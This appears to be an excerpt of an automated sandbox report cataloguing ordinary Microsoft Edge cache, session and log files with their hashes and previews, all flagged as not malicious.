                                                                                                                                                                                                                                                                                                                  Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):190385
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.389117777370999
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:9VWzrK1zCa59wJjB3JiEL/8/UczowxpmBhfVoDe/3:h9wX3JxL/mnfxwSu
                                                                                                                                                                                                                                                                                                                  MD5:93B08AD29BF1AF258E8BD42F0C4F76D0
                                                                                                                                                                                                                                                                                                                  SHA1:B42C26065DAEABE0697969D084A3B177E7F61DA8
                                                                                                                                                                                                                                                                                                                  SHA-256:CD7BEC8EB0E8228B435D269032A0CD88A78AD42A4968FC779912CB2B3AC67CD3
                                                                                                                                                                                                                                                                                                                  SHA-512:9F756976DBAC8F266897AD60D05802BE220EF7467F5181D8CF6A5A706F5D960AD0B267884F51EE9C97F2608C3A3B42326AB177CB2E804BA88C2005ADEA804337
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:0\r..m..........rSG.....0....Lp.................;o......*X........,T.8..`,.....L`.....,T...`......L`......Rc..I.....exports...Rcj.i@....module....Rc..N.....define....Rb.q&.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.....Z.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....d...,T.`.`z.....L`..........a............a.........Dr8..............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jwcljXl/l+/l9/lxEgW/l7Ul:MctqOjo
                                                                                                                                                                                                                                                                                                                  MD5:565FD15A53FCA5DACA47D12560D64E25
                                                                                                                                                                                                                                                                                                                  SHA1:B7C37488453B34247087473D8BB5B58E6BA26C18
                                                                                                                                                                                                                                                                                                                  SHA-256:9D47B84250003821F1D1E864B76C500F12FB60B20345501AEE97DEB6728C7065
                                                                                                                                                                                                                                                                                                                  SHA-512:CF3E660E1901C49DB9C04720E9B70BD70D0DC49FD6BB5B65129AC89E65DB44D203965E1FADF547BC680A80D1E2067B03FE2DD4E61A13450439B1DE09AB4D565E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:@..... oy retne.........................X....,...................Q./.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jwcljXl/l+/l9/lxEgW/l7Ul:MctqOjo
                                                                                                                                                                                                                                                                                                                  MD5:565FD15A53FCA5DACA47D12560D64E25
                                                                                                                                                                                                                                                                                                                  SHA1:B7C37488453B34247087473D8BB5B58E6BA26C18
                                                                                                                                                                                                                                                                                                                  SHA-256:9D47B84250003821F1D1E864B76C500F12FB60B20345501AEE97DEB6728C7065
                                                                                                                                                                                                                                                                                                                  SHA-512:CF3E660E1901C49DB9C04720E9B70BD70D0DC49FD6BB5B65129AC89E65DB44D203965E1FADF547BC680A80D1E2067B03FE2DD4E61A13450439B1DE09AB4D565E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:@..... oy retne.........................X....,...................Q./.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jwcljXl/l+/l9/lxEgW/l7Ul:MctqOjo
                                                                                                                                                                                                                                                                                                                  MD5:565FD15A53FCA5DACA47D12560D64E25
                                                                                                                                                                                                                                                                                                                  SHA1:B7C37488453B34247087473D8BB5B58E6BA26C18
                                                                                                                                                                                                                                                                                                                  SHA-256:9D47B84250003821F1D1E864B76C500F12FB60B20345501AEE97DEB6728C7065
                                                                                                                                                                                                                                                                                                                  SHA-512:CF3E660E1901C49DB9C04720E9B70BD70D0DC49FD6BB5B65129AC89E65DB44D203965E1FADF547BC680A80D1E2067B03FE2DD4E61A13450439B1DE09AB4D565E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:@..... oy retne.........................X....,...................Q./.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):5739
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.401465953187229
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:k9ZYskuL32ZpmVnKtFVPVXJZ/R9Xp+J+ViTokQlLl9iSrk1qQyN6QJ7F6N3:+YskuaZ0VnKtFVPVXZ9Xp+JKiTDwLl9u
                                                                                                                                                                                                                                                                                                                  MD5:821F191527ABF9E2BDA949D666026EE5
                                                                                                                                                                                                                                                                                                                  SHA1:4BDC6808E876E562913BC5B5995BB90F23F94738
                                                                                                                                                                                                                                                                                                                  SHA-256:D8BF40AFAA057EA8AA5E6418A41535A9036E861F291D039E86E0EA0C35F7A74D
                                                                                                                                                                                                                                                                                                                  SHA-512:9EEC5EA3433F582E7CE7188E89C32BD777E310233E0FFF3AC3F477BAA983E17420672C8E5E3E30DC6772EACE5309BF481FF549F82E648DA9D155AA6728B1BE97
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f...................b................next-map-id.1.Cnamespace-2c4f441c_17af_4d6c_8cde_e9074bcadb71-https://ntp.msn.com/.0.?...................map-0-shd_sweeper.){.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.3.c.,.p.r.g.-.1.s.w.-.s.a.-.g.e.n.u.2.i.v.3.t.2.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.t.,.p.r.g.-.1.s.w.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.1.s.w.-.t.r.a.n.-.t.r.d.,.1.s.-.w.p.o.-.p.r.1.-.c.t.t.u.-.c.,.r.o.u.t.e.g.r.a.p.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.p.2.-.u.s.e.c.m.,.b.t.i.e.-.d.v.t.r.k.-.t.,.p.r.g.-.a.d.-.d.v.,.b.t.i.e.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.198833497972075
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJDFQL+q2Pwkn23oH+TcwtrQMxIFUtJbJDMG1ZmwPbJD6FMQLVkwOwkn23oHs:7LQyvYfYebCFUtQg/EFMQR5JfYebtJ
                                                                                                                                                                                                                                                                                                                  MD5:09EF25D9411D8E1F918C8F878F40A4AF
                                                                                                                                                                                                                                                                                                                  SHA1:7169171E5880ED07EDF1A8A37FAD7656CC8C8EB3
                                                                                                                                                                                                                                                                                                                  SHA-256:BACB95A03040040D4A1453D38552846983FF517BC5F89E01ED89458739012D78
                                                                                                                                                                                                                                                                                                                  SHA-512:4C64EDF858DC396E2BBA9426E27ACE2287A787BE1F3C25CBF79C9E2926A028C9CB512BC08ED471C6F0D55B3DD72C02C38AA4650C2DB246A96ED57FE6AF0B651B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.526 1ba8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-04:59:17.530 1ba8 Recovering log #3.2025/01/09-04:59:17.537 1ba8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.198833497972075
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJDFQL+q2Pwkn23oH+TcwtrQMxIFUtJbJDMG1ZmwPbJD6FMQLVkwOwkn23oHs:7LQyvYfYebCFUtQg/EFMQR5JfYebtJ
                                                                                                                                                                                                                                                                                                                  MD5:09EF25D9411D8E1F918C8F878F40A4AF
                                                                                                                                                                                                                                                                                                                  SHA1:7169171E5880ED07EDF1A8A37FAD7656CC8C8EB3
                                                                                                                                                                                                                                                                                                                  SHA-256:BACB95A03040040D4A1453D38552846983FF517BC5F89E01ED89458739012D78
                                                                                                                                                                                                                                                                                                                  SHA-512:4C64EDF858DC396E2BBA9426E27ACE2287A787BE1F3C25CBF79C9E2926A028C9CB512BC08ED471C6F0D55B3DD72C02C38AA4650C2DB246A96ED57FE6AF0B651B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:17.526 1ba8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-04:59:17.530 1ba8 Recovering log #3.2025/01/09-04:59:17.537 1ba8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1296
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6487928524002733
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:3Q03l6CZpsAF4unxEtLp3X2amEtG1ChqTdAuQKkOAM4T:3d7zFiLp2FEkChACHOpS
                                                                                                                                                                                                                                                                                                                  MD5:EAD8CC762F73C643279A5F39876D299F
                                                                                                                                                                                                                                                                                                                  SHA1:4201AC847CB2447D41304005F474DC75CEC696A2
                                                                                                                                                                                                                                                                                                                  SHA-256:2763D6946167FC9866FF52B8351D25446F7175B5AD1CF601103EF02AA921B4E4
                                                                                                                                                                                                                                                                                                                  SHA-512:04433E689D699CE18CCF04EB12281EFA5B50636397F05320C5F6C8D449FE1B450373B9331A1EAD8CEBB86A80544B14ABC4CAB54A927356F3A03D33E91B460353
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SNSS................................"........................................................!.............................................1..,.......$...2c4f441c_17af_4d6c_8cde_e9074bcadb71......................Pw...........................................edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x...........C+......C+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... .......................................................P...$...9.e.0.7.4.0.8.b.-.a.4.d.5.-.4.a.4.8.-.9.e.b.1.-.0.c.f.b.8.d.4.7.f.1.9.d....
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.172004801124942
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJI+fQ+q2Pwkn23oH+Tcwt7Uh2ghZIFUtJbJDB4dWZmwPbJDB4QVkwOwkn23k:72f+vYfYebIhHh2FUtQW/RV5JfYebIh9
                                                                                                                                                                                                                                                                                                                  MD5:243BAD0A6423F309D4D749E7EBC5D9B3
                                                                                                                                                                                                                                                                                                                  SHA1:87B5D458D51D952717FCED348CFA13DA6CB0C78C
                                                                                                                                                                                                                                                                                                                  SHA-256:63D918E397DE4F6C842A007F70C8354C99FFBD13FB28E98327989A7D55D98D18
                                                                                                                                                                                                                                                                                                                  SHA-512:02A5DCEAD13041F74A947DA979A66A722DCC47104785B5673B3115B82A1D84FBC470C933E837EBB0F816685A4D313A0EEE499A9356BBE4D32F0D10DA393D8D21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:16.947 17cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-04:59:17.028 17cc Recovering log #3.2025/01/09-04:59:17.028 17cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.172004801124942
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJI+fQ+q2Pwkn23oH+Tcwt7Uh2ghZIFUtJbJDB4dWZmwPbJDB4QVkwOwkn23k:72f+vYfYebIhHh2FUtQW/RV5JfYebIh9
                                                                                                                                                                                                                                                                                                                  MD5:243BAD0A6423F309D4D749E7EBC5D9B3
                                                                                                                                                                                                                                                                                                                  SHA1:87B5D458D51D952717FCED348CFA13DA6CB0C78C
                                                                                                                                                                                                                                                                                                                  SHA-256:63D918E397DE4F6C842A007F70C8354C99FFBD13FB28E98327989A7D55D98D18
                                                                                                                                                                                                                                                                                                                  SHA-512:02A5DCEAD13041F74A947DA979A66A722DCC47104785B5673B3115B82A1D84FBC470C933E837EBB0F816685A4D313A0EEE499A9356BBE4D32F0D10DA393D8D21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:16.947 17cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-04:59:17.028 17cc Recovering log #3.2025/01/09-04:59:17.028 17cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):524656
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Lsul:Ls
                                                                                                                                                                                                                                                                                                                  MD5:531518B68369A65C966755CAE6589FA1
                                                                                                                                                                                                                                                                                                                  SHA1:E9CFFD218C23F06920CDB240466FE5711638911A
                                                                                                                                                                                                                                                                                                                  SHA-256:BDF5A352139C5F1B8768FB53801CF67451CAC19AFD4DBB4DA71B2683EC22E736
                                                                                                                                                                                                                                                                                                                  SHA-512:4EAE3AE384050961E9A9BAACBF664D0ED14B99FFC85F6EAEA521603A40B4A77DCF613DABE3FBCD1BCC31BF7CE64BE8E33E36CE1EF871E05AC67C0DCBF534C782
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................#..P./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
